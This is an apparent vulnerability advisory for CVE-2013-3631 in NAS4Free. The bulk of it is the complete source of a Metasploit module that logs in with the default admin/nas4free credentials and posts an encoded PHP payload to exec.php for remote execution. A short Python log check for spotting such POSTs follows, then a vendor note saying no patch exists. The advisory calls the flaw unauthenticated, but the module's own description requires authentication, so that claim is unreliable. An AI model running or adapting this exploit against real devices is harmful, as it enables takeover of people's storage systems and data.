

NAS4Free Arbitrary Remote Code Execution Vulnerability

Published: 2014-12-05 10:56:46


CVE-ID:CVE-2013-3631

Release date: 2013-10-31

Updated: 2013-11-27

Affected systems:

NAS4Free NAS4Free <= 9.1.0.1.804

Details:

NAS4Free is an embedded open-source NAS storage system based on FreeBSD. NAS4Free 9.1.0.1.804 and earlier versions do not properly filter requests to exec.php; this implementation flaw can be exploited by an unauthenticated remote attacker to execute arbitrary PHP code.

Source:

Brandon Perry

References:

http://www.exploit-db.com/exploits/29320/

Test method:

Warning: the following program (method) may be offensive in nature and is provided only for security research and teaching. Use at your own risk!

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'
require 'rexml/document'

class Metasploit4 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'NAS4Free Arbitrary Remote Code Execution',
      'Description'    => %q{
        NAS4Free allows an authenticated user to post PHP code to a special HTTP script
        and have the code executed remotely. This module was successfully tested against
        NAS4Free version 9.1.0.1.804. Earlier builds are likely to be vulnerable as well.
      },
      'Author'         => [
        'Brandon Perry <bperry.volatile[at]gmail.com>' # Discovery / msf module
      ],
      'License'        => MSF_LICENSE,
      'References'     => [
        ['CVE', '2013-3631'],
        ['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats']
      ],
      'Payload'        => {
        'Space'       => 21244,
        'DisableNops' => true,
        'BadChars'    => ''
      },
      'Targets'        => [
        [ 'Automatic Target', { } ]
      ],
      'Privileged'     => true,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'DisclosureDate' => 'Oct 30 2013',
      'DefaultTarget'  => 0))

    register_options([
      OptString.new('USERNAME', [ true, "Username to authenticate with", "admin"]),
      OptString.new('PASSWORD', [ false, "Password to authenticate with", "nas4free"])
    ], self.class)
  end

  def exploit
    # Fetch the landing page to obtain a session cookie
    init = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, '/')
    })

    sess = init.get_cookies

    post = {
      'username' => datastore["USERNAME"],
      'password' => datastore["PASSWORD"]
    }

    login = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, '/login.php'),
      'vars_post' => post,
      'cookie'    => sess
    })

    if !login or login.code != 302
      fail_with("Login failed")
    end

    exec_resp = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, '/exec.php'),
      'cookie' => sess
    })

    if !exec_resp or exec_resp.code != 200
      fail_with('Error getting auth token from exec.php')
    end

    authtoken = ''

    #The html returned is not well formed, so I can't parse it with rexml
    exec_resp.body.each_line do |line|
      next if line !~ /authtoken/
      authtoken = line
    end

    doc = REXML::Document.new authtoken
    input = doc.root

    if !input
      fail_with('Error getting auth token')
    end

    token = input.attributes["value"]

    data = Rex::MIME::Message.new
    data.add_part('', nil, nil, 'form-data; name="txtCommand"')
    data.add_part('', nil, nil, 'form-data; name="txtRecallBuffer"')
    data.add_part('', nil, nil, 'form-data; name="dlPath"')
    data.add_part('', 'application/octet-stream', nil, 'form-data; name="ulfile"; filename=""')
    data.add_part(payload.encoded, nil, nil, 'form-data; name="txtPHPCommand"')
    #data.add_part(token, nil, nil, 'form-data; name="authtoken"')

    #I need to build the last data part by hand due to a bug in rex
    data_post = data.to_s
    data_post = data_post[0..data_post.length-data.bound.length-7]
    data_post << "\r\n--#{data.bound}"
    data_post << "\r\nContent-Disposition: form-data; name=\"authtoken\"\r\n\r\n"
    data_post << token
    data_post << "\r\n--#{data.bound}--\r\n\r\n"

    resp = send_request_raw({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, '/exec.php'),
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => data_post,
      'cookie' => sess
    })
  end
end
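A defender-side check for the request sequence the module above relies on (an added example, not part of this advisory or of the Metasploit project): it parses Common Log Format access-log lines, constructed here as sample data, and reports every POST to exec.php, noting whether the same client had an earlier login.php POST answered with 302, the success condition the module tests for. It assumes the NAS4Free web interface is served at the web root and that the web server writes standard access logs.

```python
# Added example: flag POST requests to NAS4Free's exec.php in access logs.
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Common Log Format: client ident user [time] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3}) \S+'
)

# Constructed sample log (not real NAS4Free data). The first client follows the
# login.php -> exec.php sequence; the last one posts to exec.php with no login.
SAMPLE_LOG = """\
10.0.0.5 - - [30/Oct/2013:12:00:01 +0000] "GET / HTTP/1.1" 200 1532
10.0.0.5 - - [30/Oct/2013:12:00:02 +0000] "POST /login.php HTTP/1.1" 302 0
10.0.0.5 - - [30/Oct/2013:12:00:03 +0000] "GET /exec.php HTTP/1.1" 200 4210
10.0.0.5 - - [30/Oct/2013:12:00:04 +0000] "POST /exec.php HTTP/1.1" 200 980
10.0.0.9 - - [30/Oct/2013:12:05:00 +0000] "GET /index.php HTTP/1.1" 200 2100
10.0.0.7 - - [30/Oct/2013:12:06:00 +0000] "POST /exec.php?x=1 HTTP/1.1" 200 980
"""


def parse_line(line):
    """Return (ip, method, path, status) or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = urlsplit(m.group("target")).path.lower()  # drop any query string
    return m.group("ip"), m.group("method"), path, int(m.group("status"))


def find_exec_php_posts(log_text):
    """One finding per POST to exec.php; prior_login records whether the client
    earlier completed a login.php POST answered with 302, in log order."""
    logged_in = defaultdict(bool)
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, method, path, status = rec
        if method == "POST" and path.endswith("/login.php") and status == 302:
            logged_in[ip] = True
        elif method == "POST" and path.endswith("/exec.php"):
            findings.append({"ip": ip, "status": status,
                             "prior_login": logged_in[ip]})
    return findings
```

Run `find_exec_php_posts(SAMPLE_LOG)` to see the two findings; a finding with `prior_login` False is the case the advisory describes (exec.php reached without authentication) and deserves the first look.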

Solution:

Vendor patch:

NAS4Free

--------

The vendor has not yet released a patch or upgrade. Users of this software are advised to monitor the vendor's homepage for the latest version:

http://sourceforge.net/projects/nas4free/

References:

http://www.kb.cert.org/vuls/id/326830

https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats